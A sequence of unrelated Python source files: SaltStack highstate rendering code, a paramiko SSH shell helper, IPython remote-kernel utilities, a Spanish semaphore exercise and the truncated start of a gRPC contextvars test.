except SaltRenderError as exc:
msg = "Rendering SLS '{0}:{1}' failed: {2}".format(saltenv, sls, exc)
log.critical(msg)
errors.append(msg)
except Exception as exc: # pylint: disable=broad-except
msg = "Rendering SLS {0} failed, render error: {1}".format(sls, exc)
log.critical(
msg,
# Show the traceback if the debug logging level is enabled
exc_info_on_loglevel=logging.DEBUG,
)
errors.append("{0}\n{1}".format(msg, traceback.format_exc()))
try:
mods.add("{0}:{1}".format(saltenv, sls))
except AttributeError:
pass
if state:
if not isinstance(state, dict):
errors.append("SLS {0} does not render to a dictionary".format(sls))
else:
include = []
if "include" in state:
if not isinstance(state["include"], list):
err = (
"Include Declaration in SLS {0} is not formed "
"as a list".format(sls)
)
errors.append(err)
else:
include = state.pop("include")
self._handle_extend(state, sls, saltenv, errors)
self._handle_exclude(state, sls, saltenv, errors)
self._handle_state_decls(state, sls, saltenv, errors)
for inc_sls in include:
# inc_sls may take the form of:
# 'sls.to.include' <- same as {<saltenv>: 'sls.to.include'}
# {<env_key>: 'sls.to.include'}
# {'_xenv': 'sls.to.resolve'}
xenv_key = "_xenv"
if isinstance(inc_sls, dict):
env_key, inc_sls = inc_sls.popitem()
else:
env_key = saltenv
if env_key not in self.avail:
msg = (
"Nonexistent saltenv '{0}' found in include "
"of '{1}' within SLS '{2}:{3}'".format(
env_key, inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
if inc_sls.startswith("."):
match = re.match(r"^(\.+)(.*)$", inc_sls)
if match:
levels, include = match.groups()
else:
msg = (
"Badly formatted include {0} found in include "
"in SLS '{2}:{3}'".format(inc_sls, saltenv, sls)
)
log.error(msg)
errors.append(msg)
continue
level_count = len(levels)
p_comps = sls.split(".")
if state_data.get("source", "").endswith("/init.sls"):
p_comps.append("init")
if level_count > len(p_comps):
msg = (
"Attempted relative include of '{0}' "
"within SLS '{1}:{2}' "
"goes beyond top level package ".format(
inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
inc_sls = ".".join(p_comps[:-level_count] + [include])
if env_key != xenv_key:
if matches is None:
matches = []
# Resolve inc_sls in the specified environment
if env_key in matches or fnmatch.filter(
self.avail[env_key], inc_sls
):
resolved_envs = [env_key]
else:
resolved_envs = []
else:
# Resolve inc_sls in the subset of environment matches
resolved_envs = [
aenv
for aenv in matches
if fnmatch.filter(self.avail[aenv], inc_sls)
]
# An include must be resolved to a single environment, or
# the include must exist in the current environment
if len(resolved_envs) == 1 or saltenv in resolved_envs:
# Match inc_sls against the available states in the
# resolved env, matching wildcards in the process. If
# there were no matches, then leave inc_sls as the
# target so that the next recursion of render_state
# will recognize the error.
sls_targets = fnmatch.filter(self.avail[saltenv], inc_sls) or [
inc_sls
]
for sls_target in sls_targets:
r_env = (
resolved_envs[0] if len(resolved_envs) == 1 else saltenv
)
mod_tgt = "{0}:{1}".format(r_env, sls_target)
if mod_tgt not in mods:
nstate, err = self.render_state(
sls_target, r_env, mods, matches
)
if nstate:
self.merge_included_states(state, nstate, errors)
state.update(nstate)
if err:
errors.extend(err)
else:
msg = ""
if not resolved_envs:
msg = (
"Unknown include: Specified SLS {0}: {1} is not available on the salt "
"master in saltenv(s): {2} "
).format(
env_key,
inc_sls,
", ".join(matches) if env_key == xenv_key else env_key,
)
elif len(resolved_envs) > 1:
msg = (
"Ambiguous include: Specified SLS {0}: {1} is available on the salt master "
"in multiple available saltenvs: {2}"
).format(env_key, inc_sls, ", ".join(resolved_envs))
log.critical(msg)
errors.append(msg)
try:
self._handle_iorder(state)
except TypeError:
log.critical("Could not render SLS %s. Syntax error detected.", sls)
else:
state = {}
return state, errors
def _handle_iorder(self, state):
"""
Take a state and apply the iorder system
"""
if self.opts["state_auto_order"]:
for name in state:
for s_dec in state[name]:
if not isinstance(s_dec, six.string_types):
# PyDSL OrderedDict?
continue
if not isinstance(state[name], dict):
# Include's or excludes as lists?
continue
if not isinstance(state[name][s_dec], list):
# Bad syntax, let the verify seq pick it up later on
continue
found = False
if s_dec.startswith("_"):
continue
for arg in state[name][s_dec]:
if isinstance(arg, dict):
if len(arg) > 0:
if next(six.iterkeys(arg)) == "order":
found = True
if not found:
if not isinstance(state[name][s_dec], list):
# quite certainly a syntax error, managed elsewhere
continue
state[name][s_dec].append({"order": self.iorder})
self.iorder += 1
return state
def _handle_state_decls(self, state, sls, saltenv, errors):
"""
Add sls and saltenv components to the state
"""
for name in state:
if not isinstance(state[name], dict):
if name == "__extend__":
continue
if name == "__exclude__":
continue
if isinstance(state[name], six.string_types):
# Is this is a short state, it needs to be padded
if "." in state[name]:
comps = state[name].split(".")
state[name] = {
"__sls__": sls,
"__env__": saltenv,
comps[0]: [comps[1]],
}
continue
errors.append("ID {0} in SLS {1} is not a dictionary".format(name, sls))
continue
skeys = set()
for key in list(state[name]):
if key.startswith("_"):
continue
if not isinstance(state[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - source: salt://redis/redis.conf
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{0}' in SLS '{1}' contains multiple state "
"declarations of the same type".format(name, sls)
)
continue
state[name][comps[0]] = state[name].pop(key)
state[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
if "__sls__" not in state[name]:
state[name]["__sls__"] = sls
if "__env__" not in state[name]:
state[name]["__env__"] = saltenv
def _handle_extend(self, state, sls, saltenv, errors):
"""
Take the extend dec out of state and apply to the highstate global
dec
"""
if "extend" in state:
ext = state.pop("extend")
if not isinstance(ext, dict):
errors.append(
("Extension value in SLS '{0}' is not a " "dictionary").format(sls)
)
return
for name in ext:
if not isinstance(ext[name], dict):
errors.append(
(
"Extension name '{0}' in SLS '{1}' is "
"not a dictionary".format(name, sls)
)
)
continue
if "__sls__" not in ext[name]:
ext[name]["__sls__"] = sls
if "__env__" not in ext[name]:
ext[name]["__env__"] = saltenv
for key in list(ext[name]):
if key.startswith("_"):
continue
if not isinstance(ext[name][key], list):
continue
if "." in key:
comps = key.split(".")
ext[name][comps[0]] = ext[name].pop(key)
ext[name][comps[0]].append(comps[1])
state.setdefault("__extend__", []).append(ext)
def _handle_exclude(self, state, sls, saltenv, errors):
"""
Take the exclude dec out of the state and apply it to the highstate
global dec
"""
if "exclude" in state:
exc = state.pop("exclude")
if not isinstance(exc, list):
err = (
"Exclude Declaration in SLS {0} is not formed "
"as a list".format(sls)
)
errors.append(err)
state.setdefault("__exclude__", []).extend(exc)
def render_highstate(self, matches):
"""
Gather the state files and render them into a single unified salt
high data structure.
"""
highstate = self.building_highstate
all_errors = []
mods = set()
statefiles = []
for saltenv, states in six.iteritems(matches):
for sls_match in states:
if saltenv in self.avail:
statefiles = fnmatch.filter(self.avail[saltenv], sls_match)
elif "__env__" in self.avail:
statefiles = fnmatch.filter(self.avail["__env__"], sls_match)
else:
all_errors.append(
"No matching salt environment for environment "
"'{0}' found".format(saltenv)
)
# if we did not found any sls in the fileserver listing, this
# may be because the sls was generated or added later, we can
# try to directly execute it, and if it fails, anyway it will
# return the former error
if not statefiles:
statefiles = [sls_match]
for sls in statefiles:
r_env = "{0}:{1}".format(saltenv, sls)
if r_env in mods:
continue
state, errors = self.render_state(sls, saltenv, mods, matches)
if state:
self.merge_included_states(highstate, state, errors)
for i, error in enumerate(errors[:]):
if "is not available" in error:
# match SLS foobar in environment
this_sls = "SLS {0} in saltenv".format(sls_match)
if this_sls in error:
errors[i] = (
"No matching sls found for '{0}' "
"in env '{1}'".format(sls_match, saltenv)
)
all_errors.extend(errors)
self.clean_duplicate_extends(highstate)
return highstate, all_errors
def clean_duplicate_extends(self, highstate):
if "__extend__" in highstate:
highext = []
for items in (six.iteritems(ext) for ext in highstate["__extend__"]):
for item in items:
if item not in highext:
highext.append(item)
highstate["__extend__"] = [{t[0]: t[1]} for t in highext]
def merge_included_states(self, highstate, state, errors):
# The extend members can not be treated as globally unique:
if "__extend__" in state:
highstate.setdefault("__extend__", []).extend(state.pop("__extend__"))
if "__exclude__" in state:
highstate.setdefault("__exclude__", []).extend(state.pop("__exclude__"))
for id_ in state:
if id_ in highstate:
if highstate[id_] != state[id_]:
errors.append(
(
"Detected conflicting IDs, SLS"
" IDs need to be globally unique.\n The"
" conflicting ID is '{0}' and is found in SLS"
" '{1}:{2}' and SLS '{3}:{4}'"
).format(
id_,
highstate[id_]["__env__"],
highstate[id_]["__sls__"],
state[id_]["__env__"],
state[id_]["__sls__"],
)
)
try:
highstate.update(state)
except ValueError:
errors.append("Error when rendering state with contents: {0}".format(state))
def _check_pillar(self, force=False):
"""
Check the pillar for errors, refuse to run the state if there are
errors in the pillar and return the pillar errors
"""
if force:
return True
if "_errors" in self.state.opts["pillar"]:
return False
return True
def matches_whitelist(self, matches, whitelist):
"""
Reads over the matches and returns a matches dict with just the ones
that are in the whitelist
"""
if not whitelist:
return matches
ret_matches = {}
if not isinstance(whitelist, list):
whitelist = whitelist.split(",")
for env in matches:
for sls in matches[env]:
if sls in whitelist:
ret_matches[env] = ret_matches[env] if env in ret_matches else []
ret_matches[env].append(sls)
return ret_matches
def call_highstate(
self,
exclude=None,
cache=None,
cache_name="highstate",
force=False,
whitelist=None,
orchestration_jid=None,
):
"""
Run the sequence to execute the salt highstate for this minion
"""
# Check that top file exists
tag_name = "no_|-states_|-states_|-None"
ret = {
tag_name: {
"result": False,
"comment": "No states found for this minion",
"name": "No States",
"changes": {},
"__run_num__": 0,
}
}
cfn = os.path.join(self.opts["cachedir"], "{0}.cache.p".format(cache_name))
if cache:
if os.path.isfile(cfn):
with salt.utils.files.fopen(cfn, "rb") as fp_:
high = self.serial.load(fp_)
return self.state.call_high(high, orchestration_jid)
# File exists so continue
err = []
try:
top = self.get_top()
except SaltRenderError as err:
ret[tag_name]["comment"] = "Unable to render top file: "
ret[tag_name]["comment"] += six.text_type(err.error)
return ret
except Exception: # pylint: disable=broad-except
trb = traceback.format_exc()
err.append(trb)
return err
err += self.verify_tops(top)
matches = self.top_matches(top)
if not matches:
msg = (
"No Top file or master_tops data matches found. Please see "
"master log for details."
)
ret[tag_name]["comment"] = msg
return ret
matches = self.matches_whitelist(matches, whitelist)
self.load_dynamic(matches)
if not self._check_pillar(force):
err += ["Pillar failed to render with the following messages:"]
err += self.state.opts["pillar"]["_errors"]
else:
high, errors = self.render_highstate(matches)
if exclude:
if isinstance(exclude, six.string_types):
exclude = exclude.split(",")
if "__exclude__" in high:
high["__exclude__"].extend(exclude)
else:
high["__exclude__"] = exclude
err += errors
if err:
return err
if not high:
return ret
with salt.utils.files.set_umask(0o077):
try:
if salt.utils.platform.is_windows():
# Make sure cache file isn't read-only
self.state.functions["cmd.run"](
["attrib", "-R", cfn],
python_shell=False,
output_loglevel="quiet",
)
with salt.utils.files.fopen(cfn, "w+b") as fp_:
try:
self.serial.dump(high, fp_)
except TypeError:
# Can't serialize pydsl
pass
except (IOError, OSError):
log.error('Unable to write to "state.highstate" cache file %s', cfn)
return self.state.call_high(high, orchestration_jid)
def compile_highstate(self):
"""
Return just the highstate or the errors
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
err += errors
if err:
return err
return high
def compile_low_chunks(self):
"""
Compile the highstate but don't run it, return the low chunks to
see exactly what the highstate will execute
"""
top = self.get_top()
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
# If there is extension data reconcile it
high, ext_errors = self.state.reconcile_extend(high)
errors += ext_errors
# Verify that the high data is structurally sound
errors += self.state.verify_high(high)
high, req_in_errors = self.state.requisite_in(high)
errors += req_in_errors
high = self.state.apply_exclude(high)
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.state.compile_high_data(high)
return chunks
def compile_state_usage(self):
"""
Return all used and unused states for the minion based on the top match data
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
if err:
return err
matches = self.top_matches(top)
state_usage = {}
for saltenv, states in self.avail.items():
env_usage = {
"used": [],
"unused": [],
"count_all": 0,
"count_used": 0,
"count_unused": 0,
}
env_matches = matches.get(saltenv)
for state in states:
env_usage["count_all"] += 1
if state in env_matches:
env_usage["count_used"] += 1
env_usage["used"].append(state)
else:
env_usage["count_unused"] += 1
env_usage["unused"].append(state)
state_usage[saltenv] = env_usage
return state_usage
class HighState(BaseHighState):
"""
Generate and execute the salt "High State". The High State is the
compound state derived from a group of template files stored on the
salt master or in the local cache.
"""
# a stack of active HighState objects during a state.highstate run
stack = []
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.opts = opts
self.client = salt.fileclient.get_file_client(self.opts)
BaseHighState.__init__(self, opts)
self.state = State(
self.opts,
pillar_override,
jid,
pillar_enc,
proxy=proxy,
context=context,
mocked=mocked,
loader=loader,
initial_pillar=initial_pillar,
)
self.matchers = salt.loader.matchers(self.opts)
self.proxy = proxy
# tracks all pydsl state declarations globally across sls files
self._pydsl_all_decls = {}
# a stack of current rendering Sls objects, maintained and used by the pydsl renderer.
self._pydsl_render_stack = []
def push_active(self):
self.stack.append(self)
@classmethod
def clear_active(cls):
# Nuclear option
#
# Blow away the entire stack. Used primarily by the test runner but also
# useful in custom wrappers of the HighState class, to reset the stack
# to a fresh state.
cls.stack = []
@classmethod
def pop_active(cls):
cls.stack.pop()
@classmethod
def get_active(cls):
try:
return cls.stack[-1]
except IndexError:
return None
class MasterState(State):
"""
Create a State object for master side compiling
"""
def __init__(self, opts, minion):
State.__init__(self, opts)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
# Load a modified client interface that looks like the interface used
# from the minion, but uses remote execution
#
self.functions = salt.client.FunctionWrapper(self.opts, self.opts["id"])
# Load the states, but they should not be used in this class apart
# from inspection
self.utils = salt.loader.utils(self.opts)
self.serializers = salt.loader.serializers(self.opts)
self.states = salt.loader.states(
self.opts, self.functions, self.utils, self.serializers
)
self.rend = salt.loader.render(
self.opts, self.functions, states=self.states, context=self.state_con
)
class MasterHighState(HighState):
"""
Execute highstate compilation from the master
"""
def __init__(self, master_opts, minion_opts, grains, id_, saltenv=None):
# Force the fileclient to be local
opts = copy.deepcopy(minion_opts)
opts["file_client"] = "local"
opts["file_roots"] = master_opts["master_roots"]
opts["renderer"] = master_opts["renderer"]
opts["state_top"] = master_opts["state_top"]
opts["id"] = id_
opts["grains"] = grains
HighState.__init__(self, opts)
class RemoteHighState(object):
"""
Manage gathering the data from the master
"""
# XXX: This class doesn't seem to be used anywhere
def __init__(self, opts, grains):
self.opts = opts
self.grains = grains
self.serial = salt.payload.Serial(self.opts)
# self.auth = salt.crypt.SAuth(opts)
self.channel = salt.transport.client.ReqChannel.factory(self.opts["master_uri"])
self._closing = False
def compile_master(self):
"""
Return the state data from the master
"""
load = {"grains": self.grains, "opts": self.opts, "cmd": "_master_state"}
try:
return self.channel.send(load, tries=3, timeout=72000)
except SaltReqTimeoutError:
return {}
def destroy(self):
if self._closing:
return
self._closing = True
self.channel.close()
# pylint: disable=W1701
def __del__(self):
self.destroy()
# pylint: enable=W1701
|
shell.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import time
import signal
import paramiko
from socket import socket
from threading import Thread
from typing import TextIO
from openstack_cli.modules.apputils.terminal.get_terminal_size import get_terminal_size
from openstack_cli.modules.apputils.terminal.getch import getch as _getch, FUNC_KEYS, NCODE_KEYS, VTKEYS
F12MENU = False
SIGINT = False
def _f12_commands(channel: paramiko.Channel):
global F12MENU
global SIGINT
_k = _getch()
if _k == FUNC_KEYS.F12.value:
F12MENU = not F12MENU
print(f"\n Character code debugging is: {F12MENU}")
if F12MENU:
print("> ", end='', flush=True)
elif _k == (99,): # C:
SIGINT = True
elif _k == (105,): # I
t: paramiko.Transport = channel.get_transport()
sock: socket = t.sock
localname, peername = sock.getsockname(), sock.getpeername()
local = localname if localname else ("unknown", 0)
remote = peername if peername else ("unknown", 0)
print(f"""
Connection: {t.local_version} -> {t.remote_version} ({'active' if t.active == 1 else 'inactive'}, auth: {t.authenticated})
Local endpoint: {local[0]}:{local[1]}, host key type = {t.host_key_type}
Repote Endpoint: {remote[0]}:{remote[1]}, chipher type = {t.remote_cipher}, mac = {t.remote_mac}
Preffered:
Ciphers: {','.join(t.preferred_ciphers)}
Keys: {','.join(t.preferred_keys)}
Macs: {','.join(t.preferred_macs)}
""")
else:
return chr(7)
def getch(channel: paramiko.Channel):
global SIGINT
if SIGINT:
SIGINT = False
return chr(3)
ch = _getch()
if F12MENU and ch != FUNC_KEYS.F12.value:
print(f"{ch} ", end='', flush=True)
return
elif ch == FUNC_KEYS.F12.value:
return _f12_commands(channel)
elif ch in VTKEYS:
return VTKEYS[ch]
elif ch == NCODE_KEYS.TAB.value:
return "\t"
elif ch in (NCODE_KEYS.ENTER.value, NCODE_KEYS.BACKSPACE.value, NCODE_KEYS.ESC.value):
pass
return "".join([chr(c) for c in ch])
def _sigint(signum, frame):
global SIGINT
SIGINT = True
def __buffered_reader(stdread: paramiko.ChannelFile, stdwrite: TextIO):
global SIGINT
import select
import time
channel: paramiko.Channel = stdread.channel
while not SIGINT and not channel.exit_status_ready():
if channel.recv_ready():
r, w, x = select.select([channel], [], [], 0.0)
if len(r) > 0:
stdwrite.buffer.write(channel.recv(1024))
stdwrite.flush()
else:
time.sleep(0.2)
SIGINT = True
def __input_handler(stdin: TextIO, rstdin: TextIO, channel: paramiko.Channel):
global SIGINT
while not SIGINT:
buff = getch(channel)
if buff:
if isinstance(buff, str):
buff = buff.encode("UTF-8")
rstdin.write(buff)
def __window_size_change_handler(channel: paramiko.Channel):
width, height = get_terminal_size()
while not SIGINT:
time.sleep(1)
nwidth, nheight = get_terminal_size()
if nwidth != width or nheight != height:
width, height = nwidth, nheight
channel.resize_pty(width=width, height=height)
def shell(channel: paramiko.Channel):
stdin: paramiko.ChannelFile = channel.makefile_stdin("wb")
stdout: paramiko.ChannelFile = channel.makefile("r")
stderr: paramiko.ChannelFile = channel.makefile_stderr("r")
print("Tip: F12 + I to show connection info, F12+C to close connection")
stdoutReader = Thread(target=__buffered_reader, name="stdoutReader", args=(stdout, sys.stdout))
stderrReader = Thread(target=__buffered_reader, name="stderrReader", args=(stderr, sys.stderr))
stdinWriter = Thread(target=__input_handler, name="stdinWriter", args=(sys.stdin, stdin, channel))
sizeHandler = Thread(target=__window_size_change_handler, name="TerminalSizeWatchdog", args=(channel,))
sizeHandler.setDaemon(True)
stdoutReader.setDaemon(True)
stderrReader.setDaemon(True)
stdinWriter.setDaemon(True)
orig_sigint = signal.getsignal(signal.SIGINT)
try:
signal.signal(signal.SIGINT, _sigint)
sizeHandler.start()
stderrReader.start()
stdoutReader.start()
stdinWriter.start()
stdoutReader.join()
finally:
print("Closing ssh session...")
try:
channel.close()
except:
pass
signal.signal(signal.SIGINT, orig_sigint)
|
_ipython_utils.py
|
"""Utilities for integrating with IPython
These functions should probably reside in Jupyter and IPython repositories,
after which we can import them instead of having our own definitions.
"""
import atexit
import os
try:
import queue
except ImportError:
# Python 2
import Queue as queue
import sys
from subprocess import Popen
from threading import Event, Thread
from uuid import uuid4
from IPython import get_ipython
from jupyter_client import BlockingKernelClient, write_connection_file
from jupyter_core.paths import jupyter_runtime_dir
from tornado.gen import TimeoutError
from tornado.ioloop import IOLoop
OUTPUT_TIMEOUT = 10
def run_cell_remote(ip, kc, cell):
"""Run a cell on a KernelClient
Any output from the cell will be redisplayed in the local session.
"""
msg_id = kc.execute(cell)
in_kernel = getattr(ip, "kernel", False)
if in_kernel:
socket = ip.display_pub.pub_socket
session = ip.display_pub.session
parent_header = ip.display_pub.parent_header
while True:
try:
msg = kc.get_iopub_msg(timeout=OUTPUT_TIMEOUT)
except queue.Empty:
raise TimeoutError("Timeout waiting for IPython output")
if msg["parent_header"].get("msg_id") != msg_id:
continue
msg_type = msg["header"]["msg_type"]
content = msg["content"]
if msg_type == "status":
if content["execution_state"] == "idle":
# idle means output is done
break
elif msg_type == "stream":
stream = getattr(sys, content["name"])
stream.write(content["text"])
elif msg_type in ("display_data", "execute_result", "error"):
if in_kernel:
session.send(socket, msg_type, content, parent=parent_header)
else:
if msg_type == "error":
print("\n".join(content["traceback"]), file=sys.stderr)
else:
sys.stdout.write(content["data"].get("text/plain", ""))
else:
pass
def register_worker_magic(connection_info, magic_name="worker"):
"""Register a %worker magic, given connection_info.
Both a line and cell magic are registered,
which run the given cell in a remote kernel.
"""
ip = get_ipython()
kc = BlockingKernelClient()
kc.load_connection_info(connection_info)
kc.start_channels()
def remote(line, cell=None):
"""Run the current cell on a remote IPython kernel"""
if cell is None:
# both line and cell magic
cell = line
run_cell_remote(ip, kc, cell)
remote.client = kc # preserve reference on kc, largely for mocking
ip.register_magic_function(remote, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote, magic_kind="cell", magic_name=magic_name)
def remote_magic(line, cell=None):
"""A magic for running code on a specified remote worker
The connection_info dict of the worker will be looked up
as the first positional arg to the magic.
The rest of the line (or the entire cell for a %%cell magic)
will be passed to the remote kernel.
Usage:
info = e.start_ipython(worker)[worker]
%remote info print(worker.data)
"""
# get connection info from IPython's user namespace
ip = get_ipython()
split_line = line.split(None, 1)
info_name = split_line[0]
if info_name not in ip.user_ns:
raise NameError(info_name)
connection_info = dict(ip.user_ns[info_name])
if not cell: # line magic, use the rest of the line
if len(split_line) == 1:
raise ValueError("I need some code to run!")
cell = split_line[1]
# turn info dict to hashable str for use as lookup key in _clients cache
key = ",".join(map(str, sorted(connection_info.items())))
if key in remote_magic._clients:
kc = remote_magic._clients[key]
else:
kc = BlockingKernelClient()
kc.load_connection_info(connection_info)
kc.start_channels()
kc.wait_for_ready(timeout=10)
remote_magic._clients[key] = kc
# actually run the code
run_cell_remote(ip, kc, cell)
# cache clients for re-use in remote magic
remote_magic._clients = {}
def register_remote_magic(magic_name="remote"):
"""Define the parameterized %remote magic
See remote_magic above for details.
"""
ip = get_ipython()
if ip is None:
return # do nothing if IPython's not running
ip.register_magic_function(remote_magic, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote_magic, magic_kind="cell", magic_name=magic_name)
def connect_qtconsole(connection_info, name=None, extra_args=None):
"""Open a QtConsole connected to a worker who has the given future
- identify worker with who_has
- start IPython kernel on the worker
- start qtconsole connected to the kernel
"""
runtime_dir = jupyter_runtime_dir()
if name is None:
name = uuid4().hex
path = os.path.join(runtime_dir, name + ".json")
write_connection_file(path, **connection_info)
cmd = ["jupyter", "qtconsole", "--existing", path]
if extra_args:
cmd.extend(extra_args)
Popen(cmd)
@atexit.register
def _cleanup_connection_file():
"""Cleanup our connection file when we exit."""
try:
os.remove(path)
except OSError:
pass
def start_ipython(ip=None, ns=None, log=None):
"""Start an IPython kernel in a thread
Parameters
----------
ip : str
The IP address to listen on (likely the parent object's ip).
ns : dict
Any names that should be injected into the IPython namespace.
log : logger instance
Hook up IPython's logging to an existing logger instead of the default.
"""
from IPython import get_ipython
if get_ipython() is not None:
raise RuntimeError("Cannot start IPython, it's already running.")
from ipykernel.kernelapp import IPKernelApp
# start IPython, disabling its signal handlers that won't work due to running in a thread:
app = IPKernelApp.instance(log=log)
# Don't connect to the history database
app.config.HistoryManager.hist_file = ":memory:"
# listen on all interfaces, so remote clients can connect:
if ip:
app.ip = ip
# disable some signal handling, logging
def noop():
return None
app.init_signal = noop
app.log_connection_info = noop
# start IPython in a thread
# initialization happens in the thread to avoid threading problems
# with the sqlite history
evt = Event()
def _start():
app.initialize([])
app.kernel.pre_handler_hook = noop
app.kernel.post_handler_hook = noop
app.kernel.start()
# save self in the IPython namespace as 'worker'
# inject things into the IPython namespace
if ns:
app.kernel.shell.user_ns.update(ns)
evt.set()
# start the app's IOLoop in its thread
IOLoop.current().start()
zmq_loop_thread = Thread(target=_start)
zmq_loop_thread.daemon = True
zmq_loop_thread.start()
assert evt.wait(timeout=5), "IPython didn't start in a reasonable amount of time."
return app
|
solicitud.py
|
import time
import threading
import random
#Variables globales
estudiantes_reunidos = 0
error = 1
visitantes_formados = []
#Semáforos utilizados
mutex_estudiante = threading.Semaphore(1)
mutex_visitante = threading.Semaphore(1)
profesor_libre = threading.Semaphore(0)
jefe_esperando = threading.Semaphore(0)
#Definición del profesor
def Profesor():
global severidad_profesor, num_estudiantes, num_jovenes, num_visitantes
print(" El profesor se encuentra en su oficina listo para recibir visitas")
print("")
while(num_visitantes > 0):
profesor_libre.acquire()
print(" El profesor informa que la lista de visitantes formados es:", imprimeFila())
print(" El profesor está llamando al siguiente visitante")
time.sleep(random.random())
num_visitantes = num_visitantes - 1
mutex_visitante.acquire()
if(visitantes_formados.pop(0) == -1):
#Para que el profesor acepte la solicitud, debe haber un equilibrio entre ambos tipos de argumentos, sujeto a la severidad del profesor
if(((num_jovenes*100/num_estudiantes) >= severidad_profesor) and ((num_jovenes*100/num_estudiantes) <= (100 - severidad_profesor))):
print(" El profesor ha accedido a dar más tiempo para la entrega")
else:
print(" El profesor ha determinado que la fecha de entrega no se mueve")
else:
print(" El profesor ha terminado de atender al visitante")
mutex_visitante.release()
#Definición del jefe de grupo
def JefeGrupo(id):
print(" El jefe de grupo ha iniciado la reunión y está esperando a sus compañeros")
print("")
jefe_esperando.acquire()
print(" El jefe de grupo está ecribiendo los argumentos")
time.sleep(2)
print(" El jefe de grupo ha escrito todos los argumentos y va a ir a ver al profesor")
#Región crítica de visitante
mutex_visitante.acquire()
visitantes_formados.append(id)
print(" El jefe de grupo está formado para ver al profesor en la posición" )
mutex_visitante.release()
profesor_libre.release()
#Definición del estudiante
def Estudiante(id, tipo):
global mutex_estudiante, estudiantes_reunidos, num_estudiantes
time.sleep(random.random())
#Región crítica de estudiante
mutex_estudiante.acquire()
print(13*" "+"El estudiante %s número %d ha llegado a la reunión" %(tipo, id))
estudiantes_reunidos = estudiantes_reunidos + 1
if(estudiantes_reunidos == num_estudiantes):
print(13*" "+"Los %d estudiantes están reunidos, es hora de deliberar" %(num_estudiantes))
print("")
jefe_esperando.release()
mutex_estudiante.release()
#Definición del visitante
def Visitante(id):
global mutex_visitante, visitantes_formados, profesor_libre
time.sleep(5*random.random())
#Región crítica de visitante
mutex_visitante.acquire()
visitantes_formados.append(id)
print(13*" "+"El visitante %d está formado para ver al profesor" %id)
mutex_visitante.release()
profesor_libre.release()
#Método para imprimir la fila de visitantes formados
def imprimeFila():
fila = ""
for i in visitantes_formados:
if(i==-1):
fila += " jefe de grupo,"
else:
fila += " visitante " + str(i) + ","
return fila[0:-1]
#Inicio del programa
print("")
print("")
print(" BIENVENIDO")
print("")
while(error == 1):
#Recopilación de datos a partir del usuario
try:
num_jovenes = int(input(" Ingrese el número de estudiantes jóvenes en el grupo: "))
num_mayores = int(input(" Ingrese el número de estudiantes mayores en el grupo: "))
num_visitantes = int(input(" Ingrese el número de visitantes extra para el profesor: ")) + 1
severidad_profesor = int(input(" Ingrese que tan estricto es el profesor (0-50): "))
print("")
print("")
num_estudiantes = num_jovenes + num_mayores
error = 0
except ValueError as e1:
print(" Tipo de dato equivocado, ingrese los valores de nuevo, por favor")
print("")
#Inicialización de los hilos
#Hilo del jefe de grupo
threading.Thread(target=JefeGrupo,args=[-1]).start()
#Hilo del profesor
threading.Thread(target=Profesor, args=[]).start()
print("")
#Hilos de estudiantes jóvenes
for k in range(num_jovenes):
threading.Thread(target=Estudiante,args=[k, "joven"]).start()
#Hilos de estudiantes mayores
for i in range (num_mayores):
threading.Thread(target=Estudiante,args=[num_jovenes + i, "mayor"]).start()
#Hilos de visitantes
for j in range (num_visitantes - 1):
threading.Thread(target=Visitante,args=[j]).start()
|
_contextvars_propagation_test.py
|
# Copyright 2020 The gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test of propagation of contextvars to AuthMetadataPlugin threads.."""
import contextlib
import logging
import os
import sys
import threading
import unittest
import grpc
from six.moves import queue
from tests.unit import test_common
_UNARY_UNARY = "/test/UnaryUnary"
_REQUEST = b"0000"
def _unary_unary_handler(request, context):
return request
def contextvars_supported():
try:
import contextvars
return True
except ImportError:
return False
class _GenericHandler(grpc.GenericRpcHandler):
def service(self, handler_call_details):
if handler_call_details.method == _UNARY_UNARY:
return grpc.unary_unary_rpc_method_handler(_unary_unary_handler)
else:
raise NotImplementedError()
@contextlib.contextmanager
def _server():
try:
server = test_common.test_server()
target = 'localhost:0'
port = server.add_insecure_port(target)
server.add_generic_rpc_handlers((_GenericHandler(),))
server.start()
yield port
finally:
server.stop(None)
if contextvars_supported():
import contextvars
_EXPECTED_VALUE = 24601
test_var = contextvars.ContextVar("test_var", default=None)
def set_up_expected_context():
test_var.set(_EXPECTED_VALUE)
class TestCallCredentials(grpc.AuthMetadataPlugin):
def __call__(self, context, callback):
if test_var.get(
